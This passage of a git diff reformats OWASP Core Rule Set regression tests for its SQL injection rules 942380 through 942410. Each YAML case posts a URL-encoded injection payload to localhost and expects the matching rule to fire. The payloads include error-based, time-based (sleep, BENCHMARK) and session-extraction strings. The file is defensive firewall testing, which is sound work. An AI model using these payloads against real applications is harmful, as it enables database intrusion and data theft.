input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 25 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 26 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 27 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 28 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 29 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 30 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 31 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute node_" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 32 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute scald" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 33 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute system" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 34 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute user_" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 35 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute views" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 36 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute patha" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 37 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute workb" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 38 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "execute panel" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 39 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=from+information_schema.tables+where+1%3D2+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 40 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 41 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 42 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 43 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 44 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_id: 45 desc: "SQL Injection Attack: EXISTS" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))" - version: HTTP/1.0 - output: - log_contains: id "942380" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))" + version: HTTP/1.0 + output: + log_contains: id "942380" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml index 62e8200bf..b90d64dd2 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml @@ -2,22 +2,19 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942390.yaml tests: - - test_title: 942390-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=sdfsd%27or%201%20%3e%201" - version: HTTP/1.0 - output: - log_contains: id "942390" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=sdfsd%27or%201%20%3e%201" + version: HTTP/1.0 + output: + log_contains: id "942390" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml index 7845fb918..31616f078 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml @@ -2,42 +2,38 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 942400.yaml tests: - - test_title: 942400-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # variable name boundary attacks - data: "and '5'orig_var_datavarname=whatever" - version: HTTP/1.0 - output: - log_contains: id "942400" - - test_title: 942400-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # variable name boundary attacks + data: "and '5'orig_var_datavarname=whatever" + version: HTTP/1.0 + output: + log_contains: id "942400" + - test_id: 2 desc: "SQL Injection Attack - false positive" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # variable name boundary attacks - data: "and 7 oranges" - version: HTTP/1.0 - output: - no_log_contains: id "942400" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # variable name boundary attacks + data: "and 7 oranges" + version: HTTP/1.0 + output: + no_log_contains: id "942400" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml index 75f566775..83030ad0a 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml @@ -2,2012 +2,1892 @@ meta: author: "Christoph Hansen, azurit" description: None - enabled: true - name: 942410.yaml tests: - - test_title: 942410-1 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ABS(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-2 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "benchmark(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-3 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BENChmARk(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-4 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cast(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-5 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CAST(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-6 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "char(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-7 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "chaR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-8 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "chr(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-9 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CHR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-10 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COALESCE(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-11 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Compress (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-12 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "concat (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-13 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cOnCaT(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-14 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "concat_ws(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-15 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "convert(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-16 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cOnVeRt(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-17 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COS(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-18 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COUNT(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-19 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CURRENT_USER(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-20 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "database (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-21 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "date(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-22 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=date%5D%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-23 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=day.+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-24 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=day%26%27%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-25 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=decode%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-26 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=default%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-27 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ELT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-28 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=encode%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-29 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ExtractValue%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-30 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=EXTRACTVALUE%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-31 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=floor%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-32 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FLOOR+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-33 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=format%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-34 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=GROUP_CONCAT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-35 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=hex%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-36 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=hEx%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-37 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if+%21%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-38 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" 